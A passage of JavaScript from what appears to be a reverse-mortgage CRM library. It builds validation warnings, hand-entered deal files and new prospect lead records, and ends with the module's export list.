  if(!String(x.rate||"").trim())w.push("No rate or margin.");
  if(!hv)w.push("No home value.");
  if(!amt)w.push("No loan amount / principal limit.");
  if(!comp)w.push("No comp entered — Pipeline Value won't count this deal.");
  if(amt&&cash>amt)w.push("Cash to borrower ("+$(cash)+") is more than the loan amount ("+$(amt)+").");
  if(second&&!mb)w.push("HomeSafe Second — no first lien balance entered.");
  if(hv&&amt){
    var total=amt+(second?mb:0);
    if(total>hv)w.push((second?"First lien + this loan ("+$(total)+")":"The loan amount")+" is more than the home value ("+$(hv)+").");
  }
  if(!second&&amt&&mb>amt)w.push("The balance ("+$(mb)+") is more than the loan amount — the payoff wouldn't fit.");
  var cd=String(x.closeDate||"").trim();
  if(cd&&!parseDateLocal(cd))w.push("The close date doesn't look right.");
  if(!cd&&(x.stage==="Closed"||x.stage==="Funded"||!x.stage))w.push("No close date on a "+String(x.stage||"Closed").toLowerCase()+" deal.");
  return w;
}
// → {loan, scenario}: the new pipeline file, and the scenarioRow() options
// for its history row (the caller logs it — lib never writes the database).
// `loans` mints the id (nextLoanId — Reece's LN-### series for "reece").
function manualDealFile(f,loans,staff,when){
  var x=f||{};
  var now=when instanceof Date?when:new Date();
  var me=isStaffKey(staff)?staff:"reece";
  var p=manualProgram(x.program)||{name:"Other",rate:"rate"};
  var program=(!x.program||x.program==="Other")?(String(x.programOther||"").trim()||"Other"):String(x.program);
  var lender=x.lender==="Other"?(String(x.lenderOther||"").trim()||"Other"):String(x.lender||"").trim();
  var rate=fmtManualRate(x.rate,p.rate);
  var second=!!p.second;
  var hv=Math.round(_num(x.homeValue)),mb=Math.round(_num(x.balance)),amount=Math.round(_num(x.amount)),cash=Math.round(_num(x.cash)),comp=Math.round(_num(x.comp));
  var dob=String(x.dob||"").trim();var age=ageFromDobStr(dob)||0;
  var st=String(x.state||"").trim().toUpperCase();
  var prop=[String(x.street||"").trim(),String(x.city||"").trim(),[st,String(x.zip||"").trim()].filter(Boolean).join(" ")].filter(Boolean).join(", ");
  var stage=STAGES.indexOf(x.stage)>=0?x.stage:"Closed";
  var cd=parseDateLocal(x.closeDate);
  var closeStr=cd?(cd.getMonth()+1)+"/"+cd.getDate()+"/"+cd.getFullYear():"";
  var terms=MANUAL_DEAL_LABEL+" · "+[program,rate].filter(Boolean).join(" ");
  var deal={manual:true,manualLabel:MANUAL_DEAL_LABEL,product:program,lender:lender,rate:rate,terms:terms,
    grossPL:amount,cashToBorrower:cash,appraisedValue:hv,payoff:second?0:mb,
    enteredAt:now.toISOString(),enteredBy:me};
  // A second lien leaves the first in place: the balance is the first lien.
  // And it is a HomeSafe Second deal, typed as one (below), so Pipeline,
  // Loan Detail, the console and Fallout all read it the same way.
  if(second){deal.firstLien=mb;deal.dealType="hs2";}
  if(closeStr)deal.closeDate=closeStr;
  var id=nextLoanId(loans,me);
  var day=now.toLocaleDateString(),time=now.toLocaleTimeString([],{hour:"2-digit",minute:"2-digit"});
  var history=Object.assign({},deal,{date:day,timestamp:now.toISOString(),homeValue:hv,mortgageBalance:mb,borrowerAge:age||null,stage:stage,rateEnv:null});
  var $=function(n){return"$"+Math.round(n).toLocaleString("en-US");};
  var summary="Deal entered by hand — "+[program,lender?"("+lender+")":"",rate].filter(Boolean).join(" ")
    +(amount?" · loan amount "+$(amount):"")+(cash?" · cash to borrower "+$(cash):"")+(comp?" · comp "+$(comp):"")
    +" · stage "+stage+(closeStr?" · close date "+closeStr:"");
  var loan={id:id,owner:me,b:String(x.name||"").trim(),ph:String(x.phone||"").trim(),em:String(x.email||"").trim(),prop:prop,
    type:second?HS2_LOAN_TYPE:/^HECM\b/i.test(program)?"HECM":"Jumbo",stage:stage,condo:false,fha:null,age:age,dob:dob,queue:null,hv:hv,mb:mb,
    src:"",ref:null,dmCampaign:"",comm:comp,estClose:closeStr||"TBD",
    deal:deal,scenarioHistory:[history],quoteLog:[],contactLog:[],
    docs:{hoa:null,payoff:null,ins:null,app:null},followUps:{},uploads:[],pushedDocs:[],portalLogins:[],statementData:null,tasks:[],
    activityLog:[{text:summary,type:"stage",timestamp:now.toLocaleString(),date:day,time:time,epoch:now.getTime()}],
    lastContactAt:null,archived:false,fundedDate:stage==="Funded"&&closeStr?closeStr:null};
  var scenario={loanId:id,leadId:null,kind:"pitch",owner:me,at:now.toISOString(),
    name:loan.b,phone:loan.ph,property:prop,
    product:{name:program,lender:lender,terms:terms,mgn:p.rate==="margin"?parseFloat(rate):null,
      gross:amount,payoff:deal.payoff,avail:cash,comp:comp},
    inputs:{age:age||null,dob:dob||null,homeValue:hv,mortgageBalance:mb},
    note:MANUAL_DEAL_LABEL+" — the lender's figures, not the calculator's"};
  return{loan:loan,scenario:scenario};
}

// ═══════════════════════════════════════════════════════════════
// A NEW LEAD typed straight onto the Pipeline ("+ New lead", Max's board)
// ═══════════════════════════════════════════════════════════════
// Max has no New Call console and no mail list (Reece, 10/2: "if it's off,
// then he can enter the stuff in for the lead and track stuff"), so his
// pipeline takes a lead as typed and makes a normal Prospect file he owns
// (`nextLoanId(loans, staff)` — LN-M### for "max"). Nothing is priced:
// comp 0, no deal — the calculator's Pitch fills those in later. The deal
// type is the same HECM / FTR / HS2 pick as the console's lead card
// (leadMeta.dealType + isReverse), so the calculator opens on the right
// scenario. The notes box goes on the file as one timestamped note. Only a
// name is required (the form's rule, not this function's).
var NEW_LEAD_TYPES=["hecm","ftr","hs2"];
function newLeadFile(f,loans,staff,when){
  var x=f||{};
  var now=when instanceof Date?when:new Date();
  var me=isStaffKey(staff)?staff:"reece";
  var kind=NEW_LEAD_TYPES.indexOf(x.dealType)>=0?x.dealType:"ftr";
  var st=String(x.state||"").trim().toUpperCase().slice(0,2);
  var prop=[String(x.street||"").trim(),String(x.city||"").trim(),[st,String(x.zip||"").trim()].filter(Boolean).join(" ")].filter(Boolean).join(", ");
  var dob=String(x.dob||"").trim();
  var note=String(x.notes||"").trim();
  var e=note?contactEntry("note",note):null;
  var day=now.toLocaleDateString(),time=now.toLocaleTimeString([],{hour:"2-digit",minute:"2-digit"});
  var log=[{text:"New lead added on the pipeline — Prospect ("+(kind==="hs2"?"HomeSafe Second":kind==="hecm"?"HECM refi":"first-time reverse")+")",type:"stage",timestamp:now.toLocaleString(),date:day,time:time,epoch:now.getTime()}]
    .concat(e?[{text:note,type:"note",timestamp:e.date+" "+e.time,date:e.date,time:e.time,epoch:e.epoch}]:[]);
  return{id:nextLoanId(loans,me),owner:me,
    b:String(x.name||"").trim(),ph:String(x.phone||"").trim(),em:String(x.email||"").trim(),prop:prop,
    type:kind==="hs2"?HS2_LOAN_TYPE:"HECM",stage:"Prospect",condo:false,fha:null,
    age:ageFromDobStr(dob)||0,dob:dob,hv:Math.round(_num(x.homeValue)),mb:Math.round(_num(x.balance)),
    src:"",ref:null,dmCampaign:"",comm:0,estClose:"TBD",deal:{},
    docs:{hoa:null,payoff:null,ins:null,app:null},followUps:{},uploads:[],pushedDocs:[],portalLogins:[],statementData:null,
    scenarioHistory:[],quoteLog:[],contactLog:e?[e]:[],
    leadMeta:{dealType:kind,isReverse:kind==="hecm"},leadNotes:note||null,
    // Spoken to, numbers not run yet — the working list that says so.
    queue:"numbers",queueAt:now.toISOString(),tasks:[],
    activityLog:log,lastContactAt:null,archived:false};
}

export { searchLeadsByContacts, outboundByPhones, fetchLeadsByIds, placeFromAddress, stateFromAddress, cityFromAddress, US_STATE_CODES, fileOwnsCallBack, newLeadFile, loansOwnerColumnMissing, markLoansOwnerColumnMissing, resetLoansOwnerColumn, isLoanOwnerColumnError, stripLoanOwner, prospectLaneCallbacks, manualDealFile, manualDealWarnings, fmtManualRate, loadHandwrittenLetterLeads, loadOutbound, outboundByPhone, updateOutbound, mergeOutboundRow, mergeOutboundResults, mergeOutboundNotes, syncOutboundRow, loadOutboundSince, loadOutboundByIds, outboundByLead, fetchLeadById, searchLeadsRemote, searchLeadsFuzzy, exportCSV, toCSV, csvFormulaGuard, csvCell, CSV_FORMULA_RE, nextLoanId, ageFromDobStr, loanAge, fmtDob, stageAtOrPast, topTodos, hashPassword, isLegacyPassword, loadState, saveState, wfPack, loanToDb, loanFromDb, settingsToDb, settingsFromDb, expenseToDb, expenseToDbSlim, expenseFromDb, expenseReceiptPath, safeStorageName, isStorageConflict, uploadReceiptFile, nextExpenseId, baToDb, baFromDb, apiLoanToLocal, defaultDocRequest, buildDocSections, smsToDb, smsToDbSlim, smsFromDb, leadFromDb, leadToDb, loadAllRows, compressImageDataURL, preparePhotoForUpload, dataUrlToBlob, readUrgentAck , isFallout, leadMetaFrom, leadMetaSet, loanDealType, isHs2File, prospectFromLoan, prospectFromLead, hasRecordedLien, leadBalance, blankProspect, prospectToCalcLead, contactEntry, quoteSnapshot, buildProspectIndex, searchProspectIndex, readCallLog, writeCallLog, pushCallLog, markCallHandled, isoDatePlus, isDueBy, fmtWhen, collectDueFollowUps, collectFollowUpItems, followUpAlertCount, FOLLOWUP_HORIZON_DAYS, swapHistory, currentSwap, pushSwapMark, repriceCandidatesFromLoans, parseDateLocal, ownerOf, leadOwner, withLeadOwner, stampLeadOwner, convertedLoanFor, lienIsHecm };